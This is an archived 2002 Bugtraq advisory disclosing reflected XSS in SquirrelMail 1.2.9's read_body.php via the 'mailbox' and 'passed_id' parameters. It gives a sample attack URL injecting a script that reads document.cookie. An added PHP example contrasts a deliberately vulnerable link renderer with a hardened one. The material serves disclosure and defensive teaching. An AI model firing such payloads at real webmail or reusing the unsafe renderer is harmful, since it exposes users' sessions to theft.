[28092] in bugtraq
SquirrelMail v1.2.9 XSS bugs
daemon@ATHENA.MIT.EDU (euronymous)
Tue Dec 3 14:12:34 2002
Date: Tue, 3 Dec 2002 07:28:14 +0300 (MSK)
From: "euronymous" <just-a-user@yandex.ru>
Reply-To: just-a-user@yandex.ru
Message-Id: <3DEC32DE.000006.06408@ariel.yandex.ru>
MIME-Version: 1.0
Errors-To: just-a-user@yandex.ru
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
when reading some email you can insert scripting code..
read_body.php doesn't filter user input in the `mailbox' and
`passed_id' variables. btw, v1.2.10 was released today. i don't
know if this version contains this xss.
sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0
[it must be in a single string]
a non-URL-encoded string also works fine.
shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
russian security guyz!!
fuck_off: slavomira and other dirty ppl in *.kz
================
im not a lame,
not yet a hacker
================
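
The missing output filtering described in this advisory, shown next to a corrected form. This is an added PHP example, not part of the original post and not SquirrelMail's code. It assumes the page reflects `mailbox` and `passed_id` into a generated link; the function names are hypothetical.

```php
<?php
// Added example, not SquirrelMail source. Assumption: the page reflects the
// `mailbox` and `passed_id` request parameters into a generated link.

// Vulnerable pattern: request values concatenated into HTML unchanged.
function render_link_unsafe(array $q): string {
    return '<a href="read_body.php?mailbox=' . $q['mailbox']
         . '&passed_id=' . $q['passed_id'] . '">next</a>';
}

// Hardened pattern: validate by type, URL-encode for the query string,
// then HTML-escape the whole value for the attribute context.
function render_link_safe(array $q): string {
    $mailbox = is_string($q['mailbox'] ?? null) ? $q['mailbox'] : 'INBOX';

    // A message id is numeric; reject anything else instead of echoing it.
    $id = filter_var($q['passed_id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '';   // caller renders a generic error instead of the input
    }

    $href = 'read_body.php?mailbox=' . rawurlencode($mailbox)
          . '&passed_id=' . $id;
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8')
         . '">next</a>';
}

// Constructed input mirroring the sample request in the advisory.
$q = [
    'mailbox'   => '<script>alert(document.cookie)</script>',
    'passed_id' => '<script>alert(document.cookie)</script>',
];

// Unsafe version: the script element is emitted verbatim into the page.
echo render_link_unsafe($q), "\n";

// Safe version: the non-numeric passed_id is rejected outright.
var_dump(render_link_safe($q));

// With a valid id, the mailbox value is percent-encoded and HTML-escaped,
// so no raw angle brackets or quotes reach the markup.
$q['passed_id'] = '42';
echo render_link_safe($q), "\n";
```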